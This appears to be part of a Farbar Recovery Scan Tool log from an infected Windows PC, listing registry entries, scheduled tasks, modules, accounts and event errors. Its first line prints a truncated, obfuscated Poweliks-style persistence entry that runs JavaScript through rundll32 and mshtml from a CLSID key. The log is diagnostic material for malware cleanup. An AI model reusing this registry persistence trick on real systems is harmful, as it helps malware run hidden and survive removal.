CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{AC7C43EC-860C-3F42-BC0D-8EF45F779604}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{B293E074-3911-36CD-B8B4-EF9FF0CE4F27}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{B4627868-756A-324D-A382-C8D5A0E84F34}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{B7326381-9491-3CA7-B151-C14B79EF5AAA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{B7EB8647-DA5A-38EF-A998-F907D1F175E9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{BA389EEB-555A-3EFA-9C9E-BCA78C2F00F5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{BBCD766F-F898-3AA9-B1C2-3EC8E03AF1FF}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{BC0DC794-79CE-3966-94CE-D10AD98D74CE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{BDE21E90-7A2A-34A6-8056-565F29D87CC1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{BF32905F-07B3-4A79-9F1A-F3118FAE9000}\InprocServer32 -> C:\Users\boylem1\AppData\Local\NEC\UC700 for Microsoft Outlook\adxloader64.dll ()
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{C51B2538-0835-3874-9BFB-46FC58C2CEF0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{C755FC48-C25A-39A3-9D17-DABA6A837C0B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{C9408795-4789-3247-9878-5BBB2B260426}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{CB06F05C-5B82-322F-A104-A43AC8E6A507}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{CBA462B6-DFDE-3490-A03A-88A8159892E2}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{CE3F5A92-FB88-3DAC-8C4D-8BC47605B13E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{D0C0115C-7387-318F-9CD0-CBA89258490C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{D23A02EC-3B94-3656-A0D7-4D20E021429D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{D3763356-D8E2-3F2B-873A-45293FA1748C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{D65E651C-A186-3E1D-B2A2-729FF6E96E64}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{D9B65A9D-4D80-3DA8-AD8F-E6244BB3C4D8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{DC533F21-FF77-3473-BF2C-0769F7A83D2A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{DC8E1398-415F-34DE-81DC-89B74F824F26}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{E052CB22-822B-3381-87AF-4428A503F794}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{E1545F49-0A1C-332A-94B1-7010FEDBD131}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{E41DEB76-7F0D-3743-A878-CA509646CDF3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{E60923A5-3485-38D5-A201-337AD6F28984}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{E63074A1-0765-3FAA-88F3-4FA40D41D5B5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{EA7FE6A2-35F7-3066-8B62-DB0AF7264BB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{EE25F13B-19A8-3646-95DC-D5010DA28F60}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{EE315693-6260-3D46-A33B-1D56734ADC31}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{EFF925C0-119E-375D-AA94-EFA14E4E30B1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{F04116DA-BB27-31E6-986F-18048029FC2C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{F2EF6333-5EEB-4FA2-94A9-FB64BA72CE5A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{F3B35FC5-F2B6-3554-9CA7-FC53A334D4EE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{F59222E3-CEAB-3E88-BB20-86FDA1BD3B3D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{F6F3E3D1-ADEE-38ED-ADAA-F06B3A89618C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{F836AB74-CCE9-4A88-BC30-330952ED4DC1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{F867AC2B-EB4C-3E31-8725-3A89EF955007}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{FB0696C8-987D-3007-A983-6BEAC40D45D4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{FD6EE631-0989-3FBE-A27A-645937B384A9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{FDA83E81-92AC-3E77-9FC5-B883CB075D2F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{FE7E130F-42FE-3F65-B95B-29793AC137AB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{FF5549C1-1B1B-3F2B-BFE9-D458087A1F52}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-10-2014 21:15:35 Scheduled Checkpoint
01-11-2014 04:00:01 Scheduled Checkpoint

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {07CC4023-E951-4739-B563-F36ADD8B01A5} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {429B4ECE-914E-4E94-B0F2-E5D37545AC46} - System32\Tasks\Microsoft\Windows\Work Folders\Work Folders Maintenance Work => C:\Windows\system32\WorkFoldersSystemTray.exe [2014-04-08] (Microsoft Corporation)
Task: {ACCD87B1-FF0E-4501-8741-68BB8145051F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: {B11BA512-54DE-4615-B2FD-A2D55E68B3C6} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-13] (Google Inc.)
Task: {C41F76B4-CFD8-4FE3-9BE6-445639088F37} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-10-29] (Adobe Systems Incorporated)
Task: {D8EDE24E-578D-4D90-9729-D4EAAD37BDC9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-13] (Google Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-07-31 11:16 - 2014-07-31 11:16 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00235008 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\JCFCoreUtils.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00030208 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csflogger.dll
2014-07-24 11:45 - 2014-07-24 11:45 - 01238528 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libxml2.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00075776 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\HttpDownloader.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 01201664 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csfnetutils.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00061440 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\dnsutils.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00158208 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\htmlcxx.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00721408 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\wcl_dll.DLL
2014-08-07 18:05 - 2014-08-07 18:05 - 00674816 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\PluginRuntime.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00408064 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\servicesframework.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00008192 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\PluginResources.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00263168 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ceb.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00542720 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\ConfigService\ConfigService.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00092160 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\SystemMonitor.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00476160 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\DesktopShareService\DesktopShareService.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 02500608 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\TelephonyService\TelephonyService.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 02903552 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\SystemService\SystemService.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00891904 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxypmp.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00784896 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxypme.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 08138752 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libpme.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00027136 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libtaah264codecbase.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00637952 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstreamer-0.10-0.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00010240 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\logitech-vt3fix.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00180736 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstaudio-0.10-0.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00050688 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstinterfaces-0.10-0.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00103424 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstpbutils-0.10-0.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00272896 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstbase-0.10-0.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00067072 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstvideo-0.10-0.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00071168 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstrtp-0.10-0.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00037888 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libgstapp-0.10-0.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00010752 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxybase.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00919552 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libcxytaf.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 01949696 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libtaf.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00022528 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CDMWrapper.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00237056 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\accessories_manager.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00490496 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\TelemetryService\TelemetryService.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 04733952 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\IMPresenceServices\IMPresenceServices.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00890368 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\csfcommunicationhistory.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00211456 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\ConversationService\ConversationService.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00023552 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\outlook-recordsource-sink.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00012800 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_system-vc90-mt-1_50.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00064000 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_thread-vc90-mt-1_50.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00023040 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\boost_chrono-vc90-mt-1_50.dll
2014-08-07 18:00 - 2014-08-07 18:00 - 00180736 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\JabberUpgradePlugin\JabberUpgradePlugin.dll
2014-08-07 18:00 - 2014-08-07 18:00 - 00288256 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\PresenceAreaPlugin\PresenceAreaPlugin.dll
2014-08-07 18:01 - 2014-08-07 18:01 - 00346112 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\ConversationWindowPlugin\ConversationWindowPlugin.dll
2014-08-07 18:01 - 2014-08-07 18:01 - 00066560 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\PresenceConnectorPlugin\PresenceConnectorPlugin.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00086016 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\ScreenCapture.dll
2014-08-07 18:01 - 2014-08-07 18:01 - 01525248 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyPlugin\TelephonyPlugin.dll
2014-08-07 18:01 - 2014-08-07 18:01 - 00169472 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyRuntime\TelephonyRuntime.dll
2014-08-07 18:01 - 2014-08-07 18:01 - 00393216 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\TelephonyDeviceSelectionPlugin\TelephonyDeviceSelectionPlugin.dll
2014-07-24 11:36 - 2014-07-24 11:36 - 00134656 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\libexpatw.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 01840128 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\VoicemailService\VoicemailService.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00237056 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\CSFIdm.dll
2014-08-07 18:01 - 2014-08-07 18:01 - 00128512 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\SoundTab\SoundTab.dll
2014-08-07 18:05 - 2014-08-07 18:05 - 00359424 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\services\CommunicationHistoryService\CommunicationHistoryService.dll
2014-08-07 18:01 - 2014-08-07 18:01 - 00203776 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\HuntGroupCallPickupPlugin\HuntGroupCallPickupPlugin.dll
2014-08-07 18:01 - 2014-08-07 18:01 - 00574976 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\WbxAudioConferencePlugin\WbxAudioConferencePlugin.dll
2014-08-07 18:02 - 2014-08-07 18:02 - 01833984 _____ () C:\Program Files (x86)\Cisco Systems\Cisco Jabber\Plugins\JabberMeetingPlugin\JabberMeetingPlugin.dll
2014-09-26 12:44 - 2011-11-29 20:00 - 00059392 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2014-09-26 12:45 - 2012-07-18 12:55 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

csadmin (S-1-5-21-477433998-1779247633-678227546-1000 - Administrator - Enabled) => C:\Users\csadmin
Guest (S-1-5-21-477433998-1779247633-678227546-501 - Limited - Disabled)
PCAdmin (S-1-5-21-477433998-1779247633-678227546-500 - Administrator - Enabled) => C:\Users\Administrator
sradmin (S-1-5-21-477433998-1779247633-678227546-1003 - Limited - Enabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/04/2014 10:08:17 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/04/2014 10:08:17 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/04/2014 10:07:27 AM) (Source: Microsoft-Windows-WMI) (EventID: 10) (User: NT AUTHORITY)
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/04/2014 09:49:00 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.2.9200.16398, time stamp: 0x50338287
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0358f818
Faulting process id: 0x2894
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3

Error: (11/04/2014 09:49:00 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
